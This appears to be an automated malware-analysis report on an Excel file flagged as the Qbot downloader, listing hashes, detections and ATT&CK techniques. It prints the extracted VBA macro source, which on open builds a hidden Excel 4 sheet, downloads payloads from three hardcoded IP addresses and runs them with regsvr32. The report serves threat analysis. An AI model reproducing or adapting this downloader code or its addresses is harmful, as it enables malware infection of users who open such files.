Qbot Office (OLE) / .XLS malware analysis — malicious · fd9f52e739e9ac39

MALICIOUS

Office (OLE) / .XLS

542.5 KB Created: 2015-06-05 18:17:20 Authoring application: Microsoft Excel First seen: 2021-10-23

MD5: 2ff61237e6b57f590e3a9416e7fe1221 SHA-1: af0b8f0505df6ac52e16924d81343652f643a711 SHA-256: fd9f52e739e9ac39c0043229ac1f3f9170ebbb0185e57b0ae23a8687f0226b55

160 Risk Score

Malware Insights

Qbot · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The critical ClamAV detection explicitly names this file as 'Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0', strongly indicating the Qbot family. The presence of an Auto_Open macro (T1059.005) confirms that the malicious VBA code executes automatically upon opening the spreadsheet, likely to download and execute a second-stage payload. The macro's obfuscated nature and truncated content prevent a more detailed analysis of its specific actions.

Heuristics 4

ClamAV: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.Qbot-b760f03263b7c21b-9950248-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas
80c3786ad171a99d819f2d48dae2a9438239712d9cb9684f883956f63b63d38c vba-macro oletools.olevba.extract_macros (decoded VBA source) 4388 bytes

Filename	Kind	Source	Size
`macros.bas` `80c3786ad171a99d819f2d48dae2a9438239712d9cb9684f883956f63b63d38c`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4388 bytes
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Public Sub applyLogosToDashboard() On Error Resume Next Application.ScreenUpdating = False Sheets("Dashboard").Activate ActiveSheet.Shapes("Apple_Logo").Visible = True ActiveSheet.Shapes("Win_Logo").Visible = False ActiveSheet.Shapes("Button_Insert_Logo").Visible = False ActiveSheet.Shapes("Button_Print_PDF").Visible = False Application.ScreenUpdating = True End Sub Private Sub asWorkbook_Activateas() End Sub Private Sub saWorkbook_Opensa() On Error Resume Next End Sub Private Sub ssaaInitWorkbookssaa() End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Nolert" Attribute VB_Base = "0{2AA7BCBC-FAD6-4ECF-A89B-7E8A59A9CC96}{C54C57B5-EA7E-4DB1-953E-3456DC1B31D2}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Module5" Sub auto_open() Excel4IntlMacroSheets.Add.Name = "Boolt" Retio Sheets("Boolt").Range("A1:M100").Interior.Color = vbBlack End Sub Function dfgdf() Sheets("Boolt").Range("H24") = "h" & "tt" & "p" & ":/" & "/190.14.37.236/" Sheets("Boolt").Range("H25") = "h" & "tt" & "p" & ":/" & "/101.99.90.73/" dfgdf1 End Function Function dfgdf1() ddddddddd = "h" & "tt" & "p" & ":/" & "/194.36.191.16/" Sheets("Boolt").Range("H26") = ddddddddd Sheets("Boolt").Range("A1:M100").Interior.Color = vbBlack End Function Attribute VB_Name = "Module1" Function jgfjgjfhfhf() Application.ScreenUpdating = False Biolaster Sheets("Boolt").Range("I12") = "Kopast" Sheets("Boolt").Visible = False Nyrtyfh dfgdf End Function Sub auto_close() Application.ScreenUpdating = True Application.DisplayAlerts = False Sheets("Boolt").Delete Application.DisplayAlerts = True End Sub Function Nyrtyfh() Sheets("Boolt").Range("G10") = Nolert.Label5.Caption Sheets("Boolt").Range("G11") = Nolert.Label5.Caption & "1" Sheets("Boolt").Range("G12") = Nolert.Label5.Caption & "2" End Function Attribute VB_Name = "Module2" Function Retio() On Error Resume Next net = "uR" net1 = "Mon" Bytruy = "R" & "E" & "G" & "I" & "STER" Neyrey = "=" JRyf = "E" & "X" & "E" & "C" Jtruhrdrgdg = "re" & "gs" & "vr" & "32" agadfg = " -s" & "il" & "en" & "t" dfdsaf = " .." & "\C" & "el" & "od" & ".w" & "ac" jgfjgjfhfhf Sheets("Boolt").Range("I9") = net & "l" & net1 Sheets("Boolt").Range("K18") = ".d" & "a" & "t" Sheets("Boolt").Range("K17") = "=N" & "O" & "W()" Sheets("Boolt").Range("H35") = "=" & "H" & "ALT()" Sheets("Boolt").Range("I17") = Jtruhrdrgdg & agadfg & dfdsaf Sheets("Boolt").Range("I18") = Jtruhrdrgdg & agadfg & dfdsaf & "1" Sheets("Boolt").Range("I19") = Jtruhrdrgdg & agadfg & dfdsaf & "2" Hrosters Sheets("Boolt").Range("H9") = Neyrey & Bytruy & "(I9,I10&J10,I11,I12,,1,9)" Sheets("Boolt").Range("H17") = Neyrey & JRyf & "(I17)" Sheets("Boolt").Range("H18") = Neyrey & JRyf & "(I18)" Sheets("Boolt").Range("H19") = Neyrey & JRyf & "(I19)" gyugg End Function Attribute VB_Name = "Module3" Function gyugg() Application.Run Sheets("Boolt").Range("H3") End Function Attribute VB_Name = "Module4" Function Hrosters() Sheets("Boolt").Range("H10") = "=Kopast(0,H24&K17&K18,G10,0,0)" Sheets("Boolt").Range("H11") = "=Kopast(0,H25&K17&K18,G11,0,0)" Sheets("Boolt").Range("H12" ... (truncated)

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub applyLogosToDashboard()
    On Error Resume Next
Application.ScreenUpdating = False


    Sheets("Dashboard").Activate
    ActiveSheet.Shapes("Apple_Logo").Visible = True
    ActiveSheet.Shapes("Win_Logo").Visible = False
    ActiveSheet.Shapes("Button_Insert_Logo").Visible = False
    ActiveSheet.Shapes("Button_Print_PDF").Visible = False

    Application.ScreenUpdating = True

End Sub


Private Sub asWorkbook_Activateas()

End Sub

Private Sub saWorkbook_Opensa()
    On Error Resume Next


End Sub

Private Sub ssaaInitWorkbookssaa()
End Sub





Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Nolert"
Attribute VB_Base = "0{2AA7BCBC-FAD6-4ECF-A89B-7E8A59A9CC96}{C54C57B5-EA7E-4DB1-953E-3456DC1B31D2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module5"

Sub auto_open()
Excel4IntlMacroSheets.Add.Name = "Boolt"

Retio


Sheets("Boolt").Range("A1:M100").Interior.Color = vbBlack
End Sub











Function dfgdf()



Sheets("Boolt").Range("H24") = "h" & "tt" & "p" & ":/" & "/190.14.37.236/"
Sheets("Boolt").Range("H25") = "h" & "tt" & "p" & ":/" & "/101.99.90.73/"
dfgdf1
End Function
Function dfgdf1()
ddddddddd = "h" & "tt" & "p" & ":/" & "/194.36.191.16/"
Sheets("Boolt").Range("H26") = ddddddddd
Sheets("Boolt").Range("A1:M100").Interior.Color = vbBlack


End Function

Attribute VB_Name = "Module1"

Function jgfjgjfhfhf()
Application.ScreenUpdating = False
Biolaster
Sheets("Boolt").Range("I12") = "Kopast"

Sheets("Boolt").Visible = False
Nyrtyfh
dfgdf
End Function
Sub auto_close()


Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Boolt").Delete
   Application.DisplayAlerts = True

End Sub

Function Nyrtyfh()

Sheets("Boolt").Range("G10") = Nolert.Label5.Caption
Sheets("Boolt").Range("G11") = Nolert.Label5.Caption & "1"
Sheets("Boolt").Range("G12") = Nolert.Label5.Caption & "2"

End Function





Attribute VB_Name = "Module2"
Function Retio()
On Error Resume Next

net = "uR"
net1 = "Mon"

Bytruy = "R" & "E" & "G" & "I" & "STER"
Neyrey = "="
JRyf = "E" & "X" & "E" & "C"
Jtruhrdrgdg = "re" & "gs" & "vr" & "32"
agadfg = " -s" & "il" & "en" & "t"
dfdsaf = " .." & "\C" & "el" & "od" & ".w" & "ac"
jgfjgjfhfhf

Sheets("Boolt").Range("I9") = net & "l" & net1
Sheets("Boolt").Range("K18") = ".d" & "a" & "t"


Sheets("Boolt").Range("K17") = "=N" & "O" & "W()"
Sheets("Boolt").Range("H35") = "=" & "H" & "ALT()"




Sheets("Boolt").Range("I17") = Jtruhrdrgdg & agadfg & dfdsaf
Sheets("Boolt").Range("I18") = Jtruhrdrgdg & agadfg & dfdsaf & "1"
Sheets("Boolt").Range("I19") = Jtruhrdrgdg & agadfg & dfdsaf & "2"

Hrosters

Sheets("Boolt").Range("H9") = Neyrey & Bytruy & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Boolt").Range("H17") = Neyrey & JRyf & "(I17)"
Sheets("Boolt").Range("H18") = Neyrey & JRyf & "(I18)"
Sheets("Boolt").Range("H19") = Neyrey & JRyf & "(I19)"
gyugg
End Function



Attribute VB_Name = "Module3"
Function gyugg()
Application.Run Sheets("Boolt").Range("H3")

End Function

Attribute VB_Name = "Module4"

Function Hrosters()
Sheets("Boolt").Range("H10") = "=Kopast(0,H24&K17&K18,G10,0,0)"
Sheets("Boolt").Range("H11") = "=Kopast(0,H25&K17&K18,G11,0,0)"
Sheets("Boolt").Range("H12"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.